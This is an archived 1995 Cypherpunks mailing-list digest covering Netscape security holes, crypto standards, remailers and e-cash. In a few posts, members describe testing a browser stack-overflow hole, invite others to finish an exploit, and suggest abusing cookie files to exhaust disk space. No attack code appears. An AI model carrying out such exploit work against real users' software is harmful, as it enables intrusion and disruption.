// Marcel van der Peijl, DigiCash bv, http://www.digicash.com/~bigmac/
// "If you had to tell the Whole Truth, you'd never shut up."

From cman at communities.com Wed Sep 27 13:54:53 1995
From: cman at communities.com (Douglas Barnes)
Date: Wed, 27 Sep 95 13:54:53 PDT
Subject: WSJ on Netscape Hole 3
Message-ID:

Somebody wrote:

>> With Netscape 1.1 the state of the stack is much more dynamic, in
>> particular the user can be viewing documents at an arbitrary depth in
>> the "web tree", each recursion will increase the stack pointer (or
>> decrease with some architectures) There is no way of knowing for
>> certain where your code will end up and thus no way to reliably alter
>> the return address on the stack to execute your arbitrary code.

I just tested this under Solaris 2.4 and it "turns out not to be the case." I approached my "bad" URL from a variety of other places, passing through various other pages, and the stack structure was still the same when I clicked on the bad guy. The big problem I'm having on this platform is the windowing register system on the SPARC architecture, which interacts in weird ways with the debugger.
The lack of determinacy about where the stack is loaded in global memory _does_ seem to be a much bigger problem on the Mac, which is still not anything approaching a multi-tasking OS. Under Unix, processes get their own address space to play in, which is always the same; on Macs, with their weird relocatable heaps, you never know where stuff is going to get loaded. I wonder how this is handled in Windows 95....

As for objections about how worthwhile this is, it's pretty clear that a patch will be available for this problem before we can finish and publicize an exploit. This is not, however, the last piece of network software that will contain problems of this sort, and it is a good idea to build up expertise in this area. I'd also suggest going after some of the other browsers... I know, for instance, that AOL's browser dies horribly on these same sort of URLs.

Good luck, all.

Doug

From hallam at w3.org Wed Sep 27 14:02:59 1995
From: hallam at w3.org (hallam at w3.org)
Date: Wed, 27 Sep 95 14:02:59 PDT
Subject: Hack Microsoft NT C2 Rating?
In-Reply-To: <199509261856.LAA24022@ix6.ix.netcom.com>
Message-ID: <9509272102.AA21900@zorch.w3.org>

>I'm more surprised by the rating since the Orange Book is basically
>for non-networked systems; Red Book rating is _much_ harder, unless
>the NSA's taking a different view of trustability of software encryption
>for authentication purposes than they used to.

I'm a little sceptical as to the relevance of C2. It is a set of criteria that is now very old and concerns military security where people can be told what to do. One way in which security systems often fail is in the security structure being so suffocating that people have to poke air holes in it so they can breathe.

I think that C2 is possibly the limit of orange/red bookishness that is reasonable to work to. It is not a trivial level of security, however; UNIX, despite all the claims, has never been shipped as C2 secure as standard by a mainstream vendor.
Even requirements involving trivial effort but which are extremely important, such as the writing of a user's security guide, have never been taken seriously on any of the UNIX platforms on which I have worked.

Phill

From alano at teleport.com Wed Sep 27 14:04:54 1995
From: alano at teleport.com (Alan Olsen)
Date: Wed, 27 Sep 95 14:04:54 PDT
Subject: [NOISE] Re: Easter Eggs
Message-ID: <199509272104.OAA16793@desiree.teleport.com>

At 09:35 AM 9/27/95 -0400, you wrote:

> Date: Tue, 26 Sep 1995 12:59:54 -0700
> From: Alan Olsen
>
> You also need X windows to find the Mozilla animated icon hack on
> Jammie Zawinski's page.
>   ^^^^^^
>
>Just for the record, that's Jamie.

Hey! I never said I could type at 1am! Yes, I know. #%#$#%ing spelling flames. Grumble. Grumble.

(BTW, the compass egg will show up in any page with /jwz/ in the url. The "anim" tag on his page is bogus.)

> obNetscapeHack: There is a feature called a "cookie file" in
> Netscape that is ripe for exploitation as a security leak. If you
> are using a Netscape server (and you may not even need that), you
> can feed all sorts of information into it without the user's
> knowledge. I have heard of one page that overloads the cookie file
> until the machine runs out of drive space. I am sure that there
> are other exploitable holes there... Any takers?
>
>Yikes! That sounds really bad. Do you have any more information on
>this? For example, can the server write to anything other than
>$HOME/.netscape-cookies? If I write protect that file, but it's still
>owned by me, will Netscape still modify it?

The url for the spec is: http://home.netscape.com/newsref/std/cookie_spec.html. The cookie overload probably only worked under 1.1 and before. The spec claims to have limits on the number of cookies you can have. But between this and the server API, I am sure that a hole or two has to exist. This is an area not explored by many. (For good reason. It is usually poorly documented...)
OBParanoia: Want something to really make you worried. Imagine this for a web page... A local law enforcement agency decides that it wants to nab a few of those "computer preverts". They create a web site that has a cgi script that looks for providers from a list. It then has a link that shows up only for people at one of those sites to "get hot porn pics". They then collect enough machine names and other info, then use the collected information to obtain a warrant to seize the ISP's logs to match users with machines. (Most browsers do not report e-mail address.) In the current hysteria I do not see this scenario too far off. Makes you wonder what constitutes entrapment anymore?

| Minister of Forced Caffinization in the DNRC | alano at teleport.com |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer: |
| mankind free in one-key-steganography-privacy!" | Ignore the man |
| -- PGP 2.6.2 key available on request -- | behind the keyboard.|
| http://www.teleport.com/~alano | |

From cman at communities.com Wed Sep 27 14:17:14 1995 From: cman at communities.com (Douglas Barnes) Date: Wed, 27 Sep 95 14:17:14 PDT Subject: JCrypt (was: getting netscape to support the remailers) Message-ID:

> That was what I was thinking as well. I am confused by
>Netscape's java support though.. I haven't seen very many details. Is
>netscape going to only support applets or can you add stuff to the
>runtime as well? In order to use jcrypt one needs access to add stuff
>to the runtime I believe.

Currently jcrypt is implemented as a glue layer on top of RSAREF. This means it has to be accessed through native methods. Also, in general, one doesn't want to be downloading trusted security code every time one uses it, even if it has strong authentication (and this hasn't been built into Java yet.) So there are two questions:

o Will netscape allow local trusted Java code to be invoked by downloaded applets?
o Will netscape support native methods in such code?
I would _greatly_ prefer to implement the jcrypt code in 100% java, but there are legal barriers to doing this where RSA is patented. JCrypt, however, is designed to allow the native methods to be replaced with Java should someone desire to do that. Also, there are other architectural concerns involving the direct or indirect invocation of local trusted encryption code by untrusted, downloaded software, which will be addressed somewhat in the next release of JCrypt. > >> >> > I started thinking about what it would take to get Netscape >> > to support sending mail through the remailers, after having >> > read the S/MIME specs which Netscape 2.0 is apparently going to >> > support. Perhaps with enough browbeating Netscape 3.0 will support >> > the remailers. >> >> Netscape doesn't need to support remailers explicitly since Netscape >>will be >> supporting Java. I think a remailer client is within Java's >>capabilities... >> Anyone disagree? >> >> andrew >> > > >-- >sameer Voice: 510-601-9777 >Community ConneXion FAX: 510-601-9734 >An Internet Privacy Provider Dialin: 510-658-6376 >http://www.c2.org (or login as "guest") sameer at c2.org From peace at BIX.com Wed Sep 27 14:51:06 1995 From: peace at BIX.com (peace at BIX.com) Date: Wed, 27 Sep 95 14:51:06 PDT Subject: Schnorr patent Message-ID: <9509271751.memo.21703@BIX.com> Now that PKP is dead, does anyone know how to contact C. Schnorr about his patent? Peace ..Tom From iagoldbe at csclub.uwaterloo.ca Wed Sep 27 15:02:29 1995 From: iagoldbe at csclub.uwaterloo.ca (Ian Goldberg) Date: Wed, 27 Sep 95 15:02:29 PDT Subject: Insecurity in WWW oriented security In-Reply-To: <9509261509.AA10554@vampire.science.gmu.edu> Message-ID: <44ceto$7qo@calum.csclub.uwaterloo.ca> [Story about hospital wanting to use "secure" Netscape deleted.] 
On a similar note, just after the unssl announcement, I got email from someone who works in network security at the Pentagon, saying that users in his domain were "expressing their desires to use Netscape to do some sensitive things." I wonder if anyone's packet-sniffing the Pentagon? - Ian "I mean _besides_ the NSA."

From habs at warwick.com Wed Sep 27 15:17:52 1995 From: habs at warwick.com (Harry S. Hawk) Date: Wed, 27 Sep 95 15:17:52 PDT Subject: [Q] Checkfree Wallet Message-ID: <199509272217.SAA22791@cmyk.warwick.com>

I'm writing about security and the Internet and in particular about the Netscape bugs. I'm interested if anyone knows technical details about the Checkfree Wallet system. Have they made code publicly available, etc. BTW. The Wallet system is supposed to be using a ~768 bit public key system and it is reported to be exportable. All decryption is done at Checkfree Corp. Users encode only the credit info, the WWW server signs the file and forwards it to Checkfree who will decrypt and process the credit card data. I've been told no credit card info is kept on any servers except for machines inside of Checkfree's network and that keep credit card numbers on file there. Please let me know if you know anything. Unless others indicate otherwise, any information will be assumed for publication. Background information is welcome as well. /hawk habs at panix.com writing for NetGuide Mag. --

From stewarts at ix.netcom.com Wed Sep 27 15:23:36 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Wed, 27 Sep 95 15:23:36 PDT Subject: alpha.c2.org nymserver Message-ID: <199509272222.PAA13596@ix7.ix.netcom.com>

>> Also, I am having a LOT of grief trying to get the alpha.c2.org remailer to
>> work for me... (yes, I have the help files)
>> Could someone walk me through it?
>
>You mean the nym server at alpha.c2.org? It seems to have about a 1 week
>delay on it...
> >Be sure the reply block that you give it is your own, and that you tell >alpha which remailer the reply block goes to. If you get a copy of the latest Private Idaho beta, it's got a convenient set of user interfaces for using the nymservers, as well as for PGP, remailers, etc. (Runs on Windows, so some of you may not find it all _that_ convenient :-) PI works with either vanilla PGP or ViaCrypt. The first step is to get the PGP key for alias at alpha.c2.org installed in your key ring, and update PI's key tables (a menu item). Then choose the "Create a nym" menu item and follow all the dialog boxes. I found it a little confusing at first, since I didn't realize the nymserver just uses secret-key encryption and not public-key, so you don't need to create a public-key-pair to do it - the only PGP involved is encrypting the message sent to the nymserver. So you can now send mail to the _highly_ anonymous wcs at alpha.c2.org :-) #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Wed Sep 27 15:23:59 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Wed, 27 Sep 95 15:23:59 PDT Subject: X.509, S/MIME, and evolution of PGP Message-ID: <199509272223.PAA13812@ix7.ix.netcom.com> I'd always heard X.509 public key certificates were a hierarchical, evil, anti-WebOfTrust ISOism. But Netscape is now doing them, and talking S/MIME, so I sat down to read the specs, and they're really not all that bad. (Technically, I've only read PKCS#6 and RFC 1422, and not the real ISOisms...) Yeah, they've got lots of clunky ASN.1 Ambiguous Encoding Rules and X.500 Silly Name Format, but those can be lived with, and the X.500 may be possible to simply ignore in most cases. 
Steve Kent, author of RFC1422, envisions that a hierarchical world with government certification authorities would be the most convenient implementation, and with the X.500 directory service serving certificates, but that's primarily editorial and not required by the technology. Since a zillion and a half people are about to acquire Netscape 2.0, which supports non-Verisign-signed X.509 certificates and DES, we can definitely extend the Web of Trust concept to that world; can we also extend secure user-to-user messaging? It's time for PGP to mutate and take over the world... An X.509 certificate has the following components 1. version 2. serial number 3. signature (algorithm ID and parameters) 4. issuer name 5. validity period 6. subject name 7. subject public key (and associated algorithm ID) expressed as ASN.1 and signed with the issuer's public key. The issuer and subject names are expressed as X.500 addresses (big deal). The CA's public key is expected to be obtained out of band, or as a chain of signatures from some other CA that you got a signature for out of band; there's no policy implementation that says who can be one. The primary requirements on CAs are to never issue the same serial number twice, maintain uniqueness on signatures for subjects, and maintain a Certificate Revocation List which is accessible somehow. Unfortunately, the data format doesn't support multiple signatures, but the documentation _does_ explicitly indicate that you can _have_ multiple certifications; you just have to drag around a bunch of separate certificates, leading to some obvious implementation opportunities. CRLs are less well-specified, though the PEM RFCs suggest a PEM format; the main requirement is that they be keyed off the serial number, which is why that has to be unique. 
RFC 1422 proposes a rooted hierarchy of CAs - a root called the Internet Policy Registration Authority, which would certify a bunch of Policy Certification Authorities, which would each have different requirements on what their CAs require from people who want to be certified, ranging from anonymous personas to heavily identified Official People, and would do a certain amount of coordination to preserve uniqueness. Becoming a PCA would require paying money to the IPRA. However, there's no requirement that a _specific_ organization become the _one_ _official_ IPRA; if somebody were to volunteer and announce themselves as the IPRA, there's no particular conflict-resolution mechanism. [ maybe it's time for a Cypherpunks Press Release? No - I didn't say it. Not me! ] But rootedness only really matters to software that cares... and as long as your software accommodates N levels of certification, you can have a Web of Trust getting back to a key you signed yourself, and either get an official personna certificate or plug your public key into your software as the IPRA (and sign the real IPRA's certificate yourself :-) Problems: 1) ITAR - shouldn't be a big deal, because all of this is building a signature/authentication mechanism, it's not doing any encryption. The encryption, if any, is a user agent issue, and that's Netscape's problem; the Web of Trust tool is an add-on. 2) RSA patent - can this be built with RSAREF? Or RSAREF with permission for a couple extra activities? Or built out of RIPEM or RIPEM-SIG? The latter has the benefit of already being exportable. 3) Netscape compliance - the Netscape folks have been real friendly, and I hope they'll leave their format for getting certificates open. 4) Other software and CA policy-makers - getting out first is worth something; then you're the standard that they have to follow instead of the other way around. For some issues, like X.500 name vs. 
DNS name, there are probably people in the IETF or community in general working on it, or alternatively you can do an ugly hack abusing the organization and address fields. 5) S/MIME - real S/MIME compliance requires support for RC2 as well as publicly available algorithms, though this is really just an X.509 handler. 6) It's a lot of work - well, yeah, it is. And I'm lazy. Is there enough related code in SSLeay to steal to help implement it? #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Wed Sep 27 15:24:06 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Wed, 27 Sep 95 15:24:06 PDT Subject: Time Keys, Some Secure Ideas (by Alias: Jay Hyden) Message-ID: <199509272223.PAA13696@ix7.ix.netcom.com> Jay - you wrote: > >> Time Keys, Some Secure Ideas << > The weakest attack on a time key based system is to spoof the >computer that keeps track of time into releasing encryption >keys i.e. change the clock. No, the weakest link is that you have to trust the person _running_ the time key system. Spoofing the clock only matters to a system you trust. Even a system running on a satellite isn't trustable unless you're running it yourself; your good friend and business partner who launched it may have put in a backdoor because the KGB threatened to kill his grandmother if he didn't. #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From stewarts at ix.netcom.com Wed Sep 27 15:24:29 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Wed, 27 Sep 95 15:24:29 PDT Subject: "Notes" to be Eclipsed by "Netscape" Message-ID: <199509272223.PAA13730@ix7.ix.netcom.com> >> I've never even _seen_ a copy of Notes running on any machine, nor do I >> know directly of _any_ of my colleagues who has. 
(Not saying nobody has, of >> course, just that I can't find anyone I know well who has.) Notes was a PC network reimplementation of PLATO, the system that also inspired notesfiles, a distant cousin of Netnews (though I'm not sure if netnews was originally inspired by PLATO or not...) Netnews assumes that articles are going to propagate for a while and then be trashed; notesfiles assumes you're building a knowledge bases that sticks around. (This transitoriness has allowed netnews to scale to its current N*100MB/day of trash :-) Notes is oriented more toward business kinds of collaboration, though it would work fine with university research projects. It's got all the PCish things you'd expect, with GUIs and menus and icons that let you include various sorts of documents and pictures as well as text; it seemed to be done reasonably well, and there's a growing market for Notes administrators. One definition of "business" is "customers who want this stuff enough that we can charge them big bucks for the servers"; client software has come down in price due to market resistance. One difficulty with Notes is that the earlier versions liked to run on Novell IPX instead of TCP/IP, so it didn't immediately jump onto companies' internal IP nets, or onto the global net for those brave souls willing to expose their business communications systems to the world. I do know companies who run multiple Notes systems so that Project X can communicate with its teaming partners at Company Y; I don't know how much integration they have with their internal Notes systems. AT&T Network Notes is a joint AT&T/Lotus project that uses AT&T's public IPX network to support Notes on; I think it's now rolled out an accepting customers, but it was mostly in press-release stage while I was at AT&T. Notes does have encryption, using RSA and I think RC4; I'm not sure if they do the 40 bits exportable/ 128 domestic bit or just use 40 bits. 
Don't know about overflow kinds of bugs; the bugs I've heard about were more problems integrating with Cc:Mail :-) #--- # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281 #--- From jsw at neon.netscape.com Wed Sep 27 15:28:27 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Wed, 27 Sep 95 15:28:27 PDT Subject: Security Update news release In-Reply-To: <199509261941.MAA02266@ix6.ix.netcom.com> Message-ID: <44cj4k$oee@tera.mcom.com> In article <199509261941.MAA02266 at ix6.ix.netcom.com>, stewarts at ix.netcom.com (Bill Stewart) writes: > >>Do the new versions use PGP's randseed.bin? If Netscape even only looks at > >>data used to keep PGP secure, Netscape will be banned from my computer > >>and every computer I am responsible for. -- For good. > > > >This is the second person who has expressed this sentiment. I don't > >understand it. If you believe that the possibility of randseed.bin > >getting out is dangerous, then why do you leave it online? Do you > >really trust every piece of software you run, every piece of software > >that can possibly access your machine over the net, to not look at > >that file? > > It makes a little bit of sense - I'm not aware of any software, > other than PGP and now Netscape, that _explicitly_ goes after randseed.bin, > though of course just about anything can try. Netscape will not read randseed.bin. I've changed it to use an environment variable that names a user specified file to read. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. 
From jsw at neon.netscape.com Wed Sep 27 15:45:42 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Wed, 27 Sep 95 15:45:42 PDT Subject: Golden Coy Freeh In-Reply-To: <199509251253.IAA07006@pipe4.nyc.pipeline.com> Message-ID: <44ck51$q0n@tera.mcom.com>

In article <199509251253.IAA07006 at pipe4.nyc.pipeline.com>, jya at pipeline.com (John Young) writes:
> Mr. Freeh wisely did not say whether the F.B.I. agents were
> able to decipher the encrypted files seized in the
> investigation. It would be foolhardy, from a
> law-enforcement perspective, to tip one's hand.

Maybe someone should file an FOIA request on this... --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine.

From dsmith at midwest.net Wed Sep 27 15:47:24 1995 From: dsmith at midwest.net (David E. Smith) Date: Wed, 27 Sep 95 15:47:24 PDT Subject: Security Update news release Message-ID: <199509272302.SAA03139@cdale1.midwest.net> -- [ From: David E. Smith * EMC.Ver #2.5.02 ] --

-----BEGIN PGP SIGNED MESSAGE-----

> >Do the new versions use PGP's randseed.bin? If Netscape even only looks at
> >data used to keep PGP secure, Netscape will be banned from my computer
> >and every computer I am responsible for. -- For good.
>
> This is the second person who has expressed this sentiment. I don't
> understand it. If you believe that the possibility of randseed.bin
> getting out is dangerous, then why do you leave it online? Do you
> really trust every piece of software you run, every piece of software
> that can possibly access your machine over the net, to not look at
> that file?

I'm still running MSDOS, so I suppose net connectivity isn't much of an issue :) At any rate, I set my randseed.bin to a length of 0 and then made it un-writable, so that new random bits have to be generated every time.
It's not too much of a trouble for me; most of my PGP use is just signing messages to certain interested parties. How would Netscape handle the fact that there aren't any random bits here? Dave "old bits, new bits, red bits, blue bits" - -- David E. Smith, c/o Southeast Missouri State University 1210 Towers South, Cape Girardeau MO USA 63701-4745 +1(314)339-3814, "dsmith at midwest.net", PGP ID 0x92732139 Opinions this ludicrous are mine. Rational ones will cost you. Heh

-----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMGnQnwwyfvCScyE5AQHzIQQAklOHwzKJY9P2DqAvdf4Rn1aZUNcqW3bz rk/FCrQP19WxqyTsO7RcRQ6q5ziwqU4qbMu+Xyci2qT0wEnOKFYhauLgLd0xxttA 7sqX9pEQVbLN9KCGz5AqFwDNlqVcdMqu0yo8s5gprmCFxDh0hXzt880rNn8tP6Id ErrhJ2NToZo= =0KRe -----END PGP SIGNATURE-----

From scmayo at rschp2.anu.edu.au Wed Sep 27 16:18:40 1995 From: scmayo at rschp2.anu.edu.au (Sherry Mayo) Date: Wed, 27 Sep 95 16:18:40 PDT Subject: chaos cryptography Message-ID: <9509272318.AA20158@toad.com>

Duh! As someone pointed out to me in email I wrote "stenography" when I meant "steganography" in the intro to the New Scientist article. (Well I'm sure you all knew what I meant) Sherry

From jsw at neon.netscape.com Wed Sep 27 16:39:53 1995 From: jsw at neon.netscape.com (Jeff Weinstein) Date: Wed, 27 Sep 95 16:39:53 PDT Subject: Netscape for Linux? In-Reply-To: <445hej$h03@tera.mcom.com> Message-ID: <44cnah$q0n@tera.mcom.com>

In article <199509251135.HAA13693 at frankenstein.piermont.com>, perry at piermont.com (Perry E. Metzger) writes:
> Jeff Weinstein writes:
> > > ... would be nice if we could get 128 bit keys, though ... (hint,
> > > hint).
> >
> > We are working this issue with the government. As soon as we can
> > make it available for download we will.
> In other words, we will never see it in our lifetimes -- the
> bureaucreeps aren't known for promoting the spread of strong crypto.

Where did I imply that if the govt. ignored us or said no that we would meekly go away with tail between legs?
> By the by, are you guys going to be taking any action vis a vis the > discovery of weak keys in RC4? We are talking to RSA about this, since our crypto code is based on BSAFE code we got from them. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From todd at lgt.com Wed Sep 27 17:58:32 1995 From: todd at lgt.com (Todd Glassey) Date: Wed, 27 Sep 95 17:58:32 PDT Subject: First Payments WG Meeting Announcement Message-ID: FYI- the FSTC E-payment Working Group meeting is happening at the W3 meeting on the day before the meeting itself. The meeting is being held at the OSF facilities. >The World Wide Web Consortium is holding a Workshop on payments. The workshop >is intended to be a small, technically oriented meeting of its payments working >group. Although it is a members only event I am willing to listen to special >pleading, alternatively companies may wish to join the consortium at our >extreemely reasonable rates. See http://www.w3.org/pub/WWW/Consortium/ for >details. > >-- >Phillip M. Hallam-Baker Not speaking for anoyone else >hallam at w3.org http://www.w3.org/hypertext/WWW/People/hallam.html >Information Superhighway -----> Hi-ho! Yow! I'm surfing Arpanet! > >ANNOUNCE: First W3C Payments WG Meeting, October 11 > >---------------------------------------------------------------------------- > >What: 1st W3C Payment WG Meeting > >Where: MIT EECS, Grier Room 34-401 (subject to change) > >When: Wednesday October 11, 9am - 5pm > >Who: W3C Member Representatives ONLY > >URL: First W3C Payments WG Meeting > >W3C is making progress on supporting electronic payments on the web. This WG >Meeting has been called to foster discussion and feedback between W3C and >its members. Discussion will focus on proposals to the W3C for payment >protocols, interfaces, and e-commerce support. 
> >The agenda for the electronic payment workshop is still being settled. At >the current time we have confirmed presentations by VISA, IBM, W3C, and the >Financial Services Technical Consortium (FSTC). Additional invitations have >been issued, and suggestions for additional presentations would be welcome. >Contact Phillip Hallam-Baker (hallam at w3.org) or Jim Miller (JMiller at w3.org) >with suggestions. > >There is a separate W3C Security WG Meeting at MIT on Tuesday, October 10th. >Contact Rohit Khare for details (khare at w3.org) > >To RSVP for the Payments WG Meeting, email the coordinator, Phillip >Hallam-Baker (hallam at w3.org) or call 617/258-5967 by 5 October. This >workshop is aimed at technologists; please include a brief description of >any relevant payments work you or your organization are involved in. > >This is a preliminary announcement of the date and time only. We have >arranged for hotel rooms at the Kendall Square Mariott. To qualify for the >MIT discount, notify Susan Hardy (susan at w3.org). > >For a review of the Consortium's plans, see W3C's report on Electronic >Payment Schemes and the Third W3C Security Workshop. Regards, T. S. Glassey Chief Technologist Looking Glass Technologies todd at lgt.com -----BEGIN PGP SIGNATURE----- Version: 2.6 iQB1AwUBMFu5E6gNRnWhagU5AQHI+gL+Mwpcd3lAWd8FF06qcG6rnLhIYveHW71a XC7xh1T0uu8qnYX31yMp17OG28jWpKUbWec1IM9/eXOi+gInA7rKICWczV8zo9Z0 0puxjRRN7yO4KfRb3cPpk+r0p6pDg01Y =bTYb -----END PGP SIGNATURE----- From wilcoxb at nagina.cs.colorado.edu Wed Sep 27 18:29:14 1995 From: wilcoxb at nagina.cs.colorado.edu (Bryce Wilcox) Date: Wed, 27 Sep 95 18:29:14 PDT Subject: weak links in the cyberbucks demo (was: weak links in DigiCash system) Message-ID: <199509280129.TAA07801@nagina.cs.colorado.edu> -----BEGIN PGP SIGNED MESSAGE----- Originally to Marcel van der Peijl at DigiCash. 
- ------- Forwarded Message To: "Marcel van der Peijl" Subject: weak links in the cyberbucks demo (was: weak links in DigiCash system) Date: Wed, 27 Sep 1995 19:20:16 -0600 From: Bryce Wilcox - -----BEGIN PGP SIGNED MESSAGE----- Marcel-- I'm sorry that my comments upset you so much, but I do not believe that they were unwarranted. It is true that the cyberbucks demo is insecure in some ways, such as using insecure e-mail. On the other hand your response that the demo is not about e-mail, it is about E-cash, and that you don't have the manpower to invest in making those extraneous things secure, is a good one and I am satisfied. The only thing I wish I had done differently was to make the title of the message "weak links in cyberbucks demo". There are, as far as I am aware, no weak links in the DigiCash system. I sincerely wish your company the best success, although I fear that MicroSoft and Visa and the like will successfully market inferior systems by use of their money and mindshare. In fact, a large part of the reason that I chose to sell BAP via a cybershop was to draw more attention to Ecash. I hope it is working. I guess if you have about a two-week queue for free cyberbucks, then maybe in a week I will get a whole lot of BAP purchases. :-) Regards, Bryce signatures follow To strive, to seek, to find and not to yield. 
bryce at colorado.edu http://ugrad-www.cs.colorado.edu/~wilcoxb/Niche.html

- -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Automatic PGP clearsigning under Unix with Bryce's Auto-PGP v1.0 iQCVAwUBMGn3/fWZSllhfG25AQEZegP/XMmoGuATQpfhBtNuIT/yUwFv9IL0+OXe auH1eMJ8d1PoWPJthrou7THpxkkOzJ0iV+GrTKS0n1dSQ2REbwk27SHsXce3LAEX JIy3rsKywTYuswH6aS361uaymPWusMr6ZhAeaegxnoSWnY3/Z2RlPCxDnhpROBsk vKgIf1mt8ww= =TRMS - -----END PGP SIGNATURE-----

- ------- End of Forwarded Message

-----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Automatic PGP clearsigning under Unix with Bryce's Auto-PGP v1.0 iQCVAwUBMGn6PfWZSllhfG25AQHuUQQAtwozCJKKxq4dlOn6SpDHs5tGbhxRWozd NUjDxffgCL2FAINsrfKR9hOXqXztYD1hQGJ4jBE+uw6sD5gGYrGct5RVuG9X51Ua HTceFbqJHd6mc3ISTMusQwQDt9kJ2DmGXqV8nt4yI20uiPKZKDVizhAqg900xqGs 78NeZuvZ5cg= =3SxM -----END PGP SIGNATURE-----

From todd at lgt.com Wed Sep 27 19:25:48 1995 From: todd at lgt.com (Todd Glassey) Date: Wed, 27 Sep 95 19:25:48 PDT Subject: Information, We want information Message-ID:

I have an immediate need of info on the liabilities of BSD type systems, and in particular the BorderWare products. I heard that in the BorderWare product itself, there are several recently discovered potential "holes"... I have a particular interest in both the Attack MO against the BSD platforms in general and the Border products in particular... Please do not send the reply to the lists but to me personally (todd at lgt.com). I will summarize if I get enough info to be worth the effort. Any comments? Thanks In Advance... Todd Glassey todd at lgt.com

From mclow at coyote.csusm.edu Wed Sep 27 20:21:08 1995 From: mclow at coyote.csusm.edu (Marshall Clow) Date: Wed, 27 Sep 95 20:21:08 PDT Subject: Microsoft & new Internet Security specs Message-ID:

> [Company News on Call] [Return to Company Listing]
> [Return to Headlines]
>
> MICROSOFT PUBLISHES SPECIFICATIONS DESIGNED TO HELP
> IMPROVE SECURITY ON THE INTERNET
>
> ATLANTA, Sept. 27 /PRNewswire/ -- Microsoft Corp.
(Nasdaq: MSFT) > today announced the publication of two specifications that address key > Internet security issues. [ blah, blah, blah ] > Both can be found on the Microsoft home page (http//:www.microsoft.com). > I command-clicked on that URL, and my mail program asked me what program I wanted to use to resolve "http//" URLs :-) The correct URL is, of course, -- Marshall Marshall Clow mclow at coyote.csusm.edu I'm an engineer. I make slides no one can read. Sometimes I eat donuts. From sameer at c2.org Wed Sep 27 20:22:56 1995 From: sameer at c2.org (sameer) Date: Wed, 27 Sep 95 20:22:56 PDT Subject: WSJ on Netscape Hole 3 In-Reply-To: Message-ID: <199509280317.UAA05182@infinity.c2.org> > As for objections about how worthwhile this is, it's pretty clear > that a patch will be available for this problem before we can finish > and publicize an exploit. Which makes an exploit all the more useful. If an exploit was published well before a patch would be available, people would make accusations that the exploit publisher was aiding vandalism. (Warranted or not, 8lgm gets these accusations, etc.) Publishing the exploit after the patch is available means more of an incentive to go get the patched version. I for one, haven't picked up the patched netscape yet. -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 An Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From tcmay at got.net Wed Sep 27 20:38:34 1995 From: tcmay at got.net (Timothy C. May) Date: Wed, 27 Sep 95 20:38:34 PDT Subject: Timothy C. May: Mini-mailbombs and Warning Letters Message-ID: At 6:33 PM 9/27/95, Travis Corcoran wrote: >I'm not sure whether you're objecting to someone asked for your key, >or the fact that they did it through a semi-automated process. If you go back to my original message you'll see that I was discussing the rising number of spams, advertisements, and "automatically-generated" posts. 
What I call a robo-warning was this: " P.S. This mail was composed by my mailreading sftwr, which automatically scans incoming mail, looking for failed keyserver requests, and prompts me whether it should automatically send this msg on my behalf. If there is a bug w this sftwr (for example, you never PGP sign your msgs, so this entire msg makes no sense), or if you're interested in the software itself (mail-secure.el: a package in lisp for emacs; this is just one of the many crypto/privacy related things it does) please mail the author of this package ( tjic at openmarket.com) for details. As to whether I needed to respond to your robo-warning about how your automatic scan of incoming mail produced some kind of Signature Failure Condition Red at your end, I just ignored your message. (As others will attest, when people ask me for my key in a non-automated way, I usually send it to them. I often regret this, as they then send me PGP-encrypted mail with innocuous contents---the same reason PRZ hates to get PGP mail.) My _overall_ point was not to attack Travis C., who I don't think I even mentioned by name, but to point out that great care must be taken in running automated mail-response programs (including "vacation" programs, "I'm away from my terminal" messages, and these kinds of automated PGP messages). Finally, since Travis is making a fairly big deal over my citing of his post (though anonymously, as I recall), I'd like to see the post he claims I signed. If it has a PGP signature, it's probably an obvious spoof or satire. >If anyone has a constructive suggestion as to how this mail could be >changed to convey more information or to be less "threatening", please >mail me. Simple, don't bother to ask in the first place. Or ask informally, in ordinary English. Skip the "This mail was composed by my mailreading sftwr, which automatically scans incoming mail, looking for failed keyserver requests..." nonsense. 
